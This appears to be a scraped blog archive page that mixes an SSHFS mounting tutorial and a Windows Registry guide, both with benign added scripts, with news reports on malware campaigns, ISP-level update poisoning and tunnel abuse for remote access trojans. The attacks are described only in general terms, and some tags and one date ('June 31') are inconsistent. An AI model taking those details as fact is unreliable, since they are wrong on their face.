To permanently mount the SSHFS drive, you have to jump through a few hoops before it’ll work. First, you must create an SSH key pair (on the local machine) with the command:

ssh-keygen -t rsa


Make sure to give the key a strong, unique passphrase.

Once the key is generated, copy it to the server with the command:

ssh-copy-id USER@SERVER


Where USER is the remote user name and SERVER is the IP address of the remote server.

Let’s test the connection to ensure it’s working properly. From the local machine, SSH to the server with:

ssh USER@SERVER


Where USER is the remote username and SERVER is the IP address of the remote server. You should be prompted for the SSH key passphrase and not your user password. Once you’ve successfully authenticated, exit from the connection with the exit command.

To make this mount permanent, you need to modify the /etc/fstab file on the local machine. Open that file for editing with:

sudo nano /etc/fstab


At the bottom of the file, paste the following line:

USER1@SERVER:/srv/data /home/USER1/data_mount fuse.sshfs x-systemd.automount,_netdev,user,idmap=user,transform_symlinks,identityfile=/home/USER2/.ssh/id_rsa,allow_other,default_permissions,uid=USER_ID_N,gid=USER_GID_N 0 0


Where USER1 is the remote username, SERVER is the IP address of the server, USER2 is the username on the local machine, and USER_ID_N and USER_GID_N are the local user’s numeric user ID and group ID. You can locate the IDs with the command:

id


You should see entries like this:

uid=1000(jack) gid=1000(jack)


In the above example, the user ID is 1000 and the group ID is also 1000.

Save the file and test the mount with:

mount -a


If you receive no errors, all is well.

There is one caveat. During the boot process, the mount will fail because it is attempted before networking is brought up. Because of this, after a reboot of the local machine, you’ll have to open a terminal window and mount the SSHFS directory with the command:

mount -a


Once you’ve done that, you’re ready to use the remote directory as if it were local.
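As an added example (not code from the original article), the POSIX shell helpers below assemble the fstab entry from the placeholders used above, read the numeric uid/gid out of a line in the format that `id` prints, and check that /etc/fuse.conf and the resulting entry are in the shape the mount needs. The host 192.0.2.10 and the user jack are constructed values.

```shell
#!/bin/sh
# Added example, not part of the original article. Helper functions for the
# SSHFS fstab entry described above. All names and hosts are constructed.

# Print the fstab entry in the layout the article uses.
# Args: remote_user server remote_dir local_user local_mount_dir uid gid
sshfs_fstab_entry() {
    _opts="x-systemd.automount,_netdev,user,idmap=user,transform_symlinks"
    _opts="$_opts,identityfile=/home/$4/.ssh/id_rsa,allow_other,default_permissions"
    _opts="$_opts,uid=$6,gid=$7"
    printf '%s@%s:%s %s fuse.sshfs %s 0 0\n' "$1" "$2" "$3" "$5" "$_opts"
}

# Pull the numeric uid and gid out of a line in the format `id` prints, e.g.
# "uid=1000(jack) gid=1000(jack) groups=1000(jack),27(sudo)".
# Prints "uid gid"; prints nothing when the line does not parse.
ids_from_id_output() {
    printf '%s\n' "$1" |
        sed -n 's/^uid=\([0-9][0-9]*\)([^)]*) gid=\([0-9][0-9]*\)(.*/\1 \2/p'
}

# Return 0 when the given fuse.conf has user_allow_other enabled (uncommented),
# which must be true before allow_other in fstab works for a normal user.
fuse_allow_other_enabled() {
    grep -q '^[[:space:]]*user_allow_other[[:space:]]*$' "$1"
}

# Return 0 when an fstab line looks like a complete SSHFS entry: six fields,
# type fuse.sshfs, _netdev so mounting waits for the network, allow_other,
# an absolute identityfile for key-based login, and numeric uid/gid so the
# mounted files are owned by the local user.
sshfs_entry_ok() {
    set -- $1   # split the line on whitespace into its fstab fields
    [ "$#" -eq 6 ] || return 1
    [ "$3" = "fuse.sshfs" ] || return 1
    for _need in _netdev allow_other "identityfile=/"; do
        case ",$4," in
            *,"$_need"*) ;;
            *) return 1 ;;
        esac
    done
    case ",$4," in
        *,uid=[0-9]*,gid=[0-9]*,*) ;;
        *) return 1 ;;
    esac
    return 0
}

# Demo with constructed values: parse a sample `id` line, build the entry,
# and print it so it can be compared against the one to paste into /etc/fstab.
demo() {
    _ids=$(ids_from_id_output "uid=1000(jack) gid=1000(jack) groups=1000(jack),27(sudo)")
    set -- $_ids
    sshfs_fstab_entry jack 192.0.2.10 /srv/data jack /home/jack/data_mount "$1" "$2"
}

demo
```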

Posted in Cyber Attacks. Tagged: Cyber Attacks, Data Security, malware, Reverse Engineering.

Are Mobile Devices Less Secure than PCs?

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

Are smartphones less secure than PCs? The answer to that is, they’re different. They face different security threats. Yet they certainly share one thing in common — they both need protection.

So, what makes a smartphone unique when it comes to security? And how do you go about protecting it? We’ll cover both here.

Apps, spam texts, and other smartphone vulnerabilities

Several facts of life about smartphones set them apart when it comes to keeping your devices safer. A quick rundown looks like this:

First off, people keep lots of apps on their phones. Old ones, new ones, ones they practically forgot they had. The security issue that comes into play there is that any app on a phone is subject to vulnerabilities.

A vulnerability in just one of the dozens of apps on a phone can lead to problems. The adage of “the weakest link” applies here. The phone is only as secure as its least secure app. And that goes for the phone’s operating system as well.

Additionally, app permissions can also introduce risks. Apps often request access to different parts of your phone to work — such as when a messenger app asks for access to contacts and photos. In the case of malicious apps, they’ll ask for far more permissions than they need. A classic example involves the old “flashlight apps” that invasively asked for a wide swath of permissions. That gave the hackers all kinds of info on users, including things like location info. Today, the practice of malicious, permission-thirsty apps continues with wallpaper apps, utility apps, games, and more.

As for other malicious apps, sometimes people download them without knowing. This often happens when shopping in third-party app stores, yet it can happen in legit app stores as well — despite rigorous review processes from Apple and Google. Sometimes, hackers sneak them through the review process for approval. These apps might include spyware, ransomware, and other forms of malware.

Many people put their smartphones to personal and professional use.[i] That might mean the phone has access to corporate apps, networks, and data. If the phone gets compromised, those corporate assets might get compromised too. And it can work in the other direction. A corporate compromise might affect an employee’s smartphone.

More and more, our phones are our wallets. Digital wallets and payment apps have certainly gained popularity. They speed up checkout and make splitting meals with friends easy. That makes the prospect of a lost or stolen phone all the more serious. An unsecured phone in the hands of another is like forking over your wallet.

Lastly, spam texts. Unique to phones are the sketchy links that crop up in texting and messaging apps. These often lead to scam sites and other sites that spread malware.

With a good sense of what makes securing your smartphone unique, let’s look at several steps you can take to protect it.

How to protect your smartphone

  1. Update your phone’s apps and operating system

Keeping your phone’s apps and operating system up to date can greatly improve your security. Updates can fix vulnerabilities that hackers rely on to pull off their malware-based attacks. It’s another tried and true method of keeping yourself safer — and of keeping your phone running great too.

  2. Lock your phone

With all that you keep and conduct on your phone, a lock is a must. Whether you have a PIN, passcode, or facial recognition available, put it into play. The same goes for things like your payment, banking, and financial apps. Ensure you have them locked too.

  3. Avoid third-party app stores

As mentioned above, app stores have measures in place to review and vet apps that help ensure they’re safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, legitimate app stores are quick to remove malicious apps from their stores once discovered, making shopping there safer still.

  4. Review apps carefully

Check out the developer — have they published several other apps with many downloads and good reviews? A legit app typically has many reviews. In contrast, malicious apps might have only a handful of (phony) five-star reviews. Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it.

  5. Go with a strong recommendation

Yet better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or app store editors themselves. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download.

  6. Keep an eye on app permissions

Another way hackers weasel their way into your device is by getting permissions to access things like your location, contacts, and photos — and they’ll use malicious apps to do it. If an app asks for way more than you bargained for, like a simple puzzle game that asks for access to your camera or microphone, it might be a scam. Delete the app.

  7. Learn how to remotely lock or erase your smartphone

So what happens if your phone ends up getting lost or stolen? A combination of device tracking, device locking, and remote erasing can help protect your phone and the data on it. Different device manufacturers have different ways of going about it, but the result is the same — you can prevent others from using your phone. You can even erase it if you’re truly worried that it’s gone for good. Apple provides iOS users with a step-by-step guide, and Google offers a guide for Android users as well.

  8. Protect your phone and block sketchy links

Comprehensive online protection software can secure your phone in the same ways that it secures your laptops and computers. Installing it can protect your privacy, and keep you safe from attacks on public Wi-Fi, just to name a few things it can do. Ours also includes Text Scam Detector that blocks sketchy links in texts, messages, and email before they do you any harm. And if you tap that link by mistake, Text Scam Detector still blocks it.

Posted in Vulnerability. Tagged: Cyber Attacks, Data Security, malware, Spyware.

Microsoft Says Azure Outage Caused by DDoS Attack Response

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

Microsoft’s response to a distributed denial-of-service (DDoS) attack appears to have caused Azure service outages that impacted many customers.

Microsoft explained on its Azure status page that a “subset of customers” experienced issues connecting to services such as Azure App Services, Application Insights, Azure IoT Central, Azure Log Search Alerts, and Azure Policy, as well as the Azure portal and some Microsoft 365 and Purview services.

According to the BBC, the outage, which lasted roughly 10 hours, impacted water utilities, courts, banks, and other types of organizations. 

Microsoft said it initially saw an unexpected usage spike that resulted in Azure Front Door and Azure Content Delivery Network components “performing below acceptable thresholds”, which led to errors, timeouts and latency issues. 

An investigation showed that a DDoS attack launched against its systems triggered protection mechanisms, but an implementation bug in those defenses caused the attack’s impact to be amplified rather than mitigated. 

The tech giant has promised to publish a preliminary incident review within 72 hours and a more detailed review within two weeks. 

It’s unclear who is behind the DDoS attack on Microsoft services, but it would not be surprising if multiple hacktivist groups take credit for it in an effort to boost their reputation. 

The incident comes just days after millions of computers worldwide were disrupted by a bad update rolled out by cybersecurity firm CrowdStrike. 

A vast majority of devices impacted by the CrowdStrike incident were restored within one week, but insurers predict billions in losses for the security firm’s major customers. CrowdStrike is also facing lawsuits over the incident.  

Posted in Cyber Attacks. Tagged: Cyber Attacks, Data Security, DDOS, malware.

DigiCert Revoking 83,000 Certificates of 6,800 Customers

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

DigiCert has started revoking thousands of certificates impacted by a recently discovered verification issue, but some customers in critical infrastructure and other sectors are asking for more time. 

The certificate authority (CA) informed customers on July 29 of an incident related to domain validation, saying that it needs to revoke some certificates within 24 hours due to strict CA/Browser Forum (CABF) rules. 

The company initially said roughly 0.4% of applicable domain validations were impacted. A DigiCert representative clarified in discussions with stakeholders that 83,267 certificates and 6,807 subscribers are affected.

DigiCert said some of the impacted customers were able to quickly reissue their certificates, but others would not be able to do so within the 24-hour time frame. 

“Unfortunately, many other customers operating critical infrastructure, vital telecommunications networks, cloud services, and healthcare industries are not in a position to be revoked without critical service interruptions. While we have deployed automation with several willing customers, the reality is that many large organizations cannot reissue and deploy new certificates everywhere in time,” said Jeremy Rowley, CISO at DigiCert.

DigiCert said in an updated notification that it has been working with browser representatives and customers in an effort to delay revocations under exceptional circumstances in order to avoid disruption to critical services. 

However, the company highlighted that “all certificates impacted by this incident, regardless of circumstances, will be revoked no later than Saturday, August 3rd 2024, 19:30 UTC.”

Rowley noted that some customers have initiated legal action against DigiCert in an attempt to block the revocation of certificates.

The certificates are being revoked due to an issue related to the process used by DigiCert to validate that a customer requesting a TLS certificate for a domain is actually the owner or administrator of that domain. 

One option is for customers to add a DNS CNAME record with a random value provided by DigiCert to their domain. The random value provided by DigiCert is prefixed by an underscore character to prevent collisions between the value and the domain name. However, the underscore prefix was not added in some cases since 2019.

In order to comply with CABF rules, DigiCert has to revoke certificates with an issue in their domain validation within 24 hours, without exception. 

Andrew Ayer, founder of SSLMate and an expert in digital certificates, believes that DigiCert’s public notification about this incident “gets the security impact of the noncompliance completely wrong”.

“[…] this is truly a security-critical incident, as there is a real risk […] that this flaw could have been exploited to get unauthorized certificates. Revocation of the improperly validated certificates is security-critical,” Ayer said.

Posted in Vulnerability. Tagged: Cyber Attacks, Data Security, malware, Spyware.

The European Union’s World-First Artificial Intelligence Rules Are Officially Taking Effect

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

The European Union’s world-first artificial intelligence law formally took effect on Thursday, marking the latest milestone in the bloc’s efforts to regulate the technology.

Officials say the Artificial Intelligence Act will protect the “fundamental rights” of citizens in the 27-nation bloc while also encouraging investment and innovation in the booming AI industry.

Years in the making, the AI Act is a comprehensive rulebook for governing AI in Europe, but it could also act as a guidepost for other governments still scrambling to draw up guardrails for the rapidly advancing technology.

The AI Act covers any product or service offered in the EU that uses artificial intelligence, whether it’s a platform from a Silicon Valley tech giant or a local startup. The restrictions are based on four levels of risk, and the vast majority of AI systems are expected to fall under the low-risk category, such as content recommendation systems or spam filters.

“The European approach to technology puts people first and ensures that everyone’s rights are preserved,” European Commission Executive Vice President Margrethe Vestager said. “With the AI Act, the EU has taken an important step to ensure that AI technology uptake respects EU rules in Europe.”

The provisions will come into force in stages, and Thursday’s implementation date starts the countdown for when they’ll kick in over the next few years.

AI systems that pose “unacceptable risk,” such as social scoring systems that influence how people behave, some types of predictive policing and emotion recognition systems in schools and workplaces, will face a blanket ban by February.

Rules covering so-called general-purpose AI models like OpenAI’s GPT-4 system will take force by August 2025.

Brussels is setting up a new AI Office that will act as the bloc’s enforcer for the general purpose AI rules.

OpenAI said in a blog post that it’s “committed to complying with the EU AI Act and we will be working closely with the new EU AI Office as the law is implemented.”

By mid-2026, the complete set of regulations, including restrictions on high-risk AI such as systems that decide who gets a loan or that operate autonomous robots, will be in force.

There’s also a fourth category for AI systems that pose a limited risk and face transparency obligations. Chatbots must inform users that they’re interacting with a machine, and AI-generated content like deepfakes will need to be labelled.

Companies that don’t comply with the rules face fines worth as much as 7% of their annual global revenue.

Posted in Vulnerability. Tagged: Cyber Attacks, Data Security, malware.

DuckDuckGo blocked in Indonesia over porn, gambling search results

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

Privacy-focused search engine DuckDuckGo has been blocked in Indonesia by its government after citizens reportedly complained about pornographic and online gambling content in its search results.

The government’s choice to block DuckDuckGo isn’t surprising considering the cultural and religious context, with Indonesia being a Muslim country where gambling is prohibited and porn is viewed as morally unacceptable.

In January 2024, Indonesia announced it blocked nearly 600,000 online gambling portals and took action against 5,000 bank accounts that engaged with them.

The government has previously blocked numerous pornography sites, Reddit, and Vimeo, and imposed temporary or partial restrictions on Tumblr, Telegram, TikTok, Netflix, and Badoo.

DuckDuckGo has now confirmed to BleepingComputer that Indonesia blocked its search engine in the country and that it has no means to respond to it.

“We can confirm that DuckDuckGo has been blocked in Indonesia due to their censorship policies. Unfortunately, there is no current path to being unblocked, similar to how we’ve been blocked in China for about a decade now,” DuckDuckGo told BleepingComputer.

At the same time, Google Search remains accessible in Indonesia, which suggests that either the tech giant has implemented effective self-censorship mechanisms for its local search engine or its size makes blocking too disruptive for internet usage in the country.

Indonesians have resorted to using VPN software to bypass the government’s restrictions. However, the Indonesian government plans to block free VPNs, making gaining access to blocked sites costly.

Free VPNs next

Virtual Private Network (VPN) tools are commonly used to bypass censorship imposed by governments and internet service providers.

When using VPNs, users can make connections from other countries to once again access DuckDuckGo, but free offerings may soon be removed.

Minister of Communication and Information Budi Arie Setiadi stated that the government intends to restrict access to free VPN tools, as they know these are used to access blocked online gambling portals.

“Yesterday, Mr. Hokky (Ministry’s Director General of Informatics Applications) had a meeting with Mr. Wayan (Ministry’s Director General of Postal and Information Technology Operations), and we will shut down free VPNs to reduce access to networks for the general public to curb the spread of online gambling,” stated Setiadi on June 31, 2024.

“I specifically have to include the issue of online gambling to make it clear that this is the darkest side of digitalization.”

The same ministry announcement highlighted the risks of free VPN services, underlining personal data theft, malware infections, and making internet connectivity slow or unreliable.

Posted in Data Breaches, Vulnerability. Tagged: Cyber Attacks, Data Security, malware.

Fake AI editor ads on Facebook push password-stealing malware

Posted on August 4, 2024 by Maq Verma

A Facebook malvertising campaign targets users searching for AI image editing tools and steals their credentials by tricking them into installing fake apps that mimic legitimate software.

The attackers exploit the popularity of AI-driven image-generation tools by creating malicious websites that closely resemble legitimate services and trick potential victims into infecting themselves with information stealer malware, as Trend Micro researchers who analyzed the campaign found.

The attacks start with phishing messages sent to Facebook page owners or administrators, which will send them to fake account protection pages designed to trick them into providing their login information.

After stealing their credentials, the threat actors hijack their accounts, take control of their pages, publish malicious social media posts, and promote them via paid advertising.

“We discovered a malvertising campaign involving a threat actor that steals social media pages (typically related to photography), changing their names to make them seem connected to popular AI photo editors,” said Trend Micro threat researcher Jaromir Horejsi.

“The threat actor then creates malicious posts with links to fake websites made to resemble the actual website of the legitimate photo editor. To increase traffic, the perpetrator then boosts the malicious posts via paid ads.”

Fake AI photo editor website (Trend Micro)

Facebook users who click the URL promoted in the malicious ad are sent to a fake web page impersonating legitimate AI photo editing and generating software, where they are prompted to download and install a software package.

However, instead of AI image editing software, the victims install the legitimate ITarian remote desktop tool configured to launch a downloader that automatically deploys the Lumma Stealer malware.

The malware then quietly infiltrates their system, allowing the attackers to collect and exfiltrate sensitive information like credentials, cryptocurrency wallet files, browser data, and password manager databases.

This data is later sold to other cybercriminals or used by the attackers to compromise the victims’ online accounts, steal their money, and promote further scams.

Attack flow (Trend Micro)

“Users should enable multi-factor authentication (MFA) on all social media accounts to add an extra layer of protection against unauthorized access,” Horejsi advised.

“Organizations should educate their employees on the dangers of phishing attacks and how to recognize suspicious messages and links. Users should always verify the legitimacy of links, especially those asking for personal information or login credentials.”

In April, a similar Facebook malvertising campaign promoted a malicious page impersonating Midjourney to target almost 1.2 million users with the Rilide Stealer Chrome browser extension.

Posted in Cyber Attacks. Tagged: Cyber Attacks, malware, Ransomware, Spyware.

Google Chrome bug breaks drag and drop from Downloads bubble

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

A recent Google Chrome update has broken the drag-and-drop feature in the Downloads bubble that previously allowed you to drag and drop downloaded files onto any website or tab in the browser.

Google Chrome’s downloads menu originally appeared in a bar at the bottom of the browser, but this changed last year when it was replaced with a downloads bubble, which appears within the toolbar.

Google Chrome download bubble (Source: BleepingComputer)

As first reported by BleepingComputer, hundreds of users are now saying that the drag-and-drop feature no longer works after recent Google Chrome updates.

“Specifically files can’t be dragged into another chrome window, or be used to open a new chrome window (opening the file with chrome),” reads a post in the Google support forums.

“Dragging onto local desktop or into other programs seems to work fine. The downloads page also works fine. Only the downloads bubble. I was able to recreate the issue by updating chrome, my current version is: 127.0.6533.73 (Official Build) (64-bit).”

In a Chromium issue found by BleepingComputer, Google Chrome engineers say reports about this bug began on July 29th and affect versions 127.0.6533.73 and 126.0.6478.185.

Google determined it was caused by a new performance-enhancing feature, ‘UIPumpImprovementsWin,’ which was rolled out to 50% of the Chrome Stable users on Sunday night.

A fix has been created by rolling back the UIPumpImprovementsWin change, which should be rolled out to users soon.

Posted in Cyber Attacks, Data Breaches. Tagged: Cyber Attacks, malware, Spyware.

Hackers breach ISP to poison software updates with malware

Posted on August 4, 2024 by Maq Verma

A Chinese hacking group tracked as StormBamboo has compromised an undisclosed internet service provider (ISP) to poison automatic software updates with malware.

Also tracked as Evasive Panda, Daggerfly, and StormCloud, this cyber-espionage group has been active since at least 2012, targeting organizations across mainland China, Hong Kong, Macao, Nigeria, and various Southeast and East Asian countries.

On Friday, Volexity threat researchers revealed that the Chinese cyber-espionage gang had exploited insecure HTTP software update mechanisms that didn’t validate digital signatures to deploy malware payloads on victims’ Windows and macOS devices.

“When these applications went to retrieve their updates, instead of installing the intended update, they would install malware, including but not limited to MACMA and POCOSTICK (aka MGBot),” cybersecurity company Volexity explained in a report published on Friday.

To do that, the attackers intercepted and modified victims’ DNS requests and poisoned them with malicious IP addresses. This delivered the malware to the targets’ systems from StormBamboo’s command-and-control servers without requiring user interaction.

For instance, they took advantage of 5KPlayer requests to update the youtube-dl dependency to push a backdoored installer hosted on their C2 servers.

​After compromising the target’s systems, the threat actors installed a malicious Google Chrome extension (ReloadText), which allowed them to harvest and steal browser cookies and mail data.

StormBamboo attack flow (Source: Volexity)

“Volexity observed StormBamboo targeting multiple software vendors, who use insecure update workflows, using varying levels of complexity in their steps for pushing malware,” the researchers added.

“Volexity notified and worked with the ISP, who investigated various key devices providing traffic-routing services on their network. As the ISP rebooted and took various components of the network offline, the DNS poisoning immediately stopped.”

In April 2023, ESET threat researchers also observed the hacking group deploying the Pocostick (MGBot) Windows backdoor by abusing the automatic update mechanism for the Tencent QQ messaging application in attacks targeting international NGOs (non-governmental organizations).

Almost a year later, in July 2024, Symantec’s threat hunting team spotted the Chinese hackers targeting an American NGO in China and multiple organizations in Taiwan with new versions of the Macma macOS backdoor and the Nightdoor Windows malware.

In both cases, although the attackers’ skill was evident, the researchers believed it was either a supply chain attack or an adversary-in-the-middle (AITM) attack but weren’t able to pin down the exact attack method.

Posted in Cyber Attacks | Tagged Cyber Attacks, Data Security, malware

How to use the Windows Registry Editor

Posted on August 3, 2024 - August 3, 2024 by Maq Verma

The Registry Editor is a powerful application that allows you to access and edit the configuration settings of the Windows operating system.

The Windows Registry is a database containing various settings used by the operating system and installed software applications.

However, it is essential to be careful when using the Registry Editor, as making incorrect changes to the Registry can cause serious problems with your system, including preventing it from booting correctly.

Therefore, before using this guide to modify the Windows Registry, please make a backup of the Registry first.

What is the Windows Registry

The Windows Registry database stores the configuration options and settings for the Windows operating system and software installed on your computer.

The Registry is organized in a hierarchical structure of keys and values, with five different ‘root’ keys at the top, as shown below, each serving a particular purpose.

The Windows Registry Editor showing the five root keys (Source: BleepingComputer)

The five different root keys in the Windows registry and their purposes are:

  1. HKEY_CLASSES_ROOT (HKCR): This key stores information about file associations and OLE object classes.
  2. HKEY_CURRENT_USER (HKCU): This key stores information about the current user’s settings and a specific user’s preferences for various applications.
  3. HKEY_LOCAL_MACHINE (HKLM): This key stores information that affects the entire computer, regardless of the logged-in user. These settings are for the computer’s hardware, operating system configuration, and software settings that affect all users.
  4. HKEY_USERS (HKU): This key stores information about all users who have logged on to the computer.
  5. HKEY_CURRENT_CONFIG (HKCC): This key stores information about the current hardware configuration of the computer.

For the most part, you will be modifying keys and values under the HKCU and HKLM root keys.

Registry keys are like folders containing other keys and values used to organize and group related settings.

For example, the HKEY_CURRENT_USER key contains settings for the current user account, such as a user’s desktop wallpaper, installed application preferences, and personal settings.

While keys are like folders, Registry values are the files stored within them, containing the specific settings for a particular key. They can have different data types, including text, numbers, and binary data.

There are several different types of registry value data types:

  • REG_SZ – A string value that contains text data, such as a username or folder path.
  • REG_DWORD – A numeric value that contains a 32-bit integer.
  • REG_QWORD – A numeric value that contains a 64-bit integer.
  • REG_BINARY – A value that contains binary data, such as an image or sound file.
  • REG_MULTI_SZ – A string value that contains multiple strings separated by null characters. This is often used for lists or arrays of values.

Each registry value type is used for a specific purpose, and understanding them can help you better manage and customize your Windows operating system.

Viewing Registry keys and values in the Windows Registry Editor (Source: BleepingComputer)

However, for the most part, when editing the Registry, you will be modifying REG_SZ values for text data and REG_DWORD values for numeric data, as they are the most common data types used to store user-editable settings.

Using the Windows Registry Editor

The Windows Registry Editor is a software application created by Microsoft and built into all versions of Windows that allows you to edit the data in the Registry.

The Registry Editor application is located at C:\Windows\regedit.exe and, for the most part, requires administrative privileges to use properly.

To open the Registry Editor, press the Windows key + R to open the Run dialog box. Next, type “regedit” in the Open field and press Enter. If you are shown a prompt asking if you would like to allow the program to make changes, select ‘Yes’ to continue.

When the Registry Editor is opened, you will see that the window is divided into two panes. The left pane displays a hierarchical tree structure of the Registry’s various keys (folders) and subkeys (subfolders).

The right pane displays the values and data associated with the selected key in the left pane.​

The Windows Registry Editor (Source: BleepingComputer)

To open a specific Registry key, use the left pane to navigate to the key you want to edit. To expand a key and reveal its subkeys, click on the plus sign (+) next to it.

To collapse a key, click the minus sign (-) next to it.

When you click on a key in the left pane, the values stored within it will be shown in the right pane.

Now that we know how to navigate the Windows Registry, let’s learn how to modify the data stored within it.

CREATE A NEW REGISTRY KEY

When configuring new settings in the Windows Registry, you may need to create a key at some point. 

Use these steps to create a new key in the Registry:

  1. Right-click on the key you want to create a new subkey under in the left pane.
  2. Select New -> Key.
  3. Enter a name for the new key and press Enter.

CREATING A REGISTRY VALUE

As Registry values contain the data that configure how an application or Windows works, it is common to need to create Registry values.

Use these steps to create a Registry value:

  1. Navigate to the key where you want to create the value.
  2. Right-click on the key and select “New” and then select the type of value you want to create. The kinds of values you can make are explained in the previous section.
  3. Give the new value a name by typing it in the box that appears.
  4. Double-click on the new value to edit its data.
  5. Enter the desired value data and click OK.

RENAMING A REGISTRY KEY

Sometimes you may need to rename a Registry key, such as when correcting a typo.

To rename a Registry key, please follow these steps:

  1. Navigate to the key you want to rename. 
  2. Right-click the key and select Rename.
  3. Enter the new name for the key in the editable field.
  4. Click anywhere to save the changes.

RENAMING A REGISTRY VALUE

Sometimes you may need to rename a Registry value, such as when correcting a typo.

To rename a Registry value, please follow these steps:

  1. Right-click the value you want to rename in the right pane and select Rename.
  2. Enter the new name for the value in the editable field.
  3. Click anywhere to save the changes.

EDITING REGISTRY VALUE DATA

To make changes to a Registry value, follow these steps:

  1. Double-click on the value you want to edit in the right pane.
  2. The Edit dialog box will appear.
  3. Enter the new data for the value in the ‘Value data’ field.
  4. Click OK to save your changes.

EXPORT A REGISTRY KEY

It is possible to export Registry keys and all their subkeys and values to a registry file. 

A registry file ends with .reg, and when you double-click on one in Windows, it will import the data back into the Registry. Exporting a registry key helps create a backup before you make changes to the Registry.

  1. Right-click on the key you want to export in the left pane.
  2. Select Export.
  3. Choose a location to save the exported key and give it a name.
  4. Click Save.

IMPORT A REGISTRY KEY

If you have previously exported a key, you can import its data back into the Registry using these steps:

  1. Click on File -> Import.
  2. Navigate to the location where you saved the exported key.
  3. Select the key file and click Open.

DELETE A REGISTRY KEY

If you need to delete a Registry key, use the following steps.

  1. Right-click on the key you want to delete in the left pane.
  2. Select ‘Delete’ from the context menu.
  3. Confirm that you want to delete the key by clicking Yes.

Note: If you delete a key, all subkeys and values underneath it will be deleted too!

Note 2: You should only delete a registry key if you know it will not cause issues with your computer!

DELETE A REGISTRY VALUE

If you need to delete a Registry value, use the following steps.

  1. Right-click on the value you want to delete in the right pane.
  2. Select ‘Delete’ from the context menu.
  3. Confirm that you want to delete the value by clicking Yes.

Note: You should only delete a registry value if you know it will not cause issues with your computer!
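The same sequence of operations (create a key, create REG_SZ, REG_DWORD and REG_MULTI_SZ values, export a .reg backup, rename and edit a value, import the backup, delete the key) carried out from PowerShell instead of the Registry Editor window, as an added example that is not part of the original article. The key HKCU:\Software\RegEditorDemo, its value names and the backup file path are constructed for the demo; everything stays under HKCU, so no administrative privileges are needed.

```powershell
# Added example (not from the original article): the Registry Editor steps above,
# scripted with PowerShell's built-in registry provider and reg.exe.
# 'RegEditorDemo' and its values are constructed for this demo.
$ErrorActionPreference = 'Stop'
$demoKey = 'HKCU:\Software\RegEditorDemo'                      # constructed demo key
$backup  = Join-Path $env:TEMP 'RegEditorDemo-backup.reg'      # constructed backup path

# 1. Create the key (New -> Key in the GUI). -Force also creates missing parent keys.
New-Item -Path $demoKey -Force | Out-Null

# 2. Create values of the types the article describes (New -> String/DWORD/Multi-String Value).
New-ItemProperty -Path $demoKey -Name 'InstallPath' -PropertyType String      -Value 'C:\Tools\Demo'    | Out-Null  # REG_SZ
New-ItemProperty -Path $demoKey -Name 'Timeout'     -PropertyType DWord       -Value 30                 | Out-Null  # REG_DWORD
New-ItemProperty -Path $demoKey -Name 'Servers'     -PropertyType MultiString -Value @('alpha', 'beta') | Out-Null  # REG_MULTI_SZ

# 3. Export the key to a .reg file BEFORE changing anything (the backup the article recommends).
#    reg.exe uses the same .reg format as the Export menu item; /y overwrites an existing file.
reg.exe export 'HKCU\Software\RegEditorDemo' $backup /y | Out-Null

# 4. Rename a value (the typo-correction case) and edit another value's data (the Edit dialog).
Rename-ItemProperty -Path $demoKey -Name 'Timeout' -NewName 'TimeoutSeconds'
Set-ItemProperty    -Path $demoKey -Name 'InstallPath' -Value 'D:\Tools\Demo'

# 5. List each value with its Registry data type, as the right pane of regedit shows it.
$key = Get-Item -Path $demoKey
foreach ($name in $key.GetValueNames()) {
    '{0,-16} {1,-12} {2}' -f $name, $key.GetValueKind($name), ($key.GetValue($name) -join ';')
}

# 6. Import the backup (File -> Import, or double-clicking the .reg file).
#    Importing MERGES: it restores 'Timeout' and the old 'InstallPath' data, but it does not
#    remove 'TimeoutSeconds', because the .reg file only knows the values that existed at export time.
reg.exe import $backup | Out-Null
(Get-ItemProperty -Path $demoKey).PSObject.Properties |
    Where-Object { $_.Name -in 'Timeout', 'TimeoutSeconds', 'InstallPath' } |
    ForEach-Object { '{0,-16} {1}' -f $_.Name, $_.Value }

# 7. Delete the key; -Recurse removes every subkey and value beneath it, as the article warns.
Remove-Item -Path $demoKey -Recurse
Remove-Item -Path $backup
```

If you want a true restore rather than a merge, delete the key first and then import the .reg file, so that values created after the export do not survive.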

When done using the Registry Editor, you can close it by clicking on the X in the window or clicking on File > Exit.

With these steps, you should now be able to use the Windows Registry Editor to navigate and edit the Registry.

However, it is vital to be careful when making changes to the Registry, as incorrect changes can cause severe problems with your system.

It is always recommended to create a backup of your Registry before making any changes.

Posted in Vulnerability | Tagged Cyber Attacks, Data Security, malware, Spyware

Hackers abuse free TryCloudflare to deliver remote access malware

Posted on August 3, 2024 - August 3, 2024 by Maq Verma

Researchers are warning of threat actors increasingly abusing the Cloudflare Tunnel service in malware campaigns that usually deliver remote access trojans (RATs).

This cybercriminal activity was first detected in February and leverages the TryCloudflare free service to distribute multiple RATs, including AsyncRAT, GuLoader, VenomRAT, Remcos RAT, and Xworm.

Campaigns attributed to the same activity cluster (Source: Proofpoint)

The Cloudflare Tunnel service allows proxying traffic through an encrypted tunnel to access local services and servers over the internet without exposing IP addresses. This should come with added security and convenience because there is no need to open any public inbound ports or to set up VPN connections.

With TryCloudflare, users can create temporary tunnels to local servers and test the service without the need for a Cloudflare account.

Each tunnel generates a temporary random subdomain on the trycloudflare.com domain, which is used to route traffic through Cloudflare’s network to the local server.

Threat actors have abused the feature in the past to gain remote access to compromised systems while evading detection.

Latest campaign

In a report today, cybersecurity company Proofpoint says that it observed malware activity targeting law, finance, manufacturing, and technology organizations with malicious .LNK files hosted on the legitimate TryCloudflare domain.

The threat actors are luring targets with tax-themed emails with URLs or attachments leading to the LNK payload. When launched, the payload runs BAT or CMD scripts that deploy PowerShell.

Two attack chains used in the campaign (Source: Proofpoint)

In the final stage of the attack, Python installers are downloaded for the final payload.

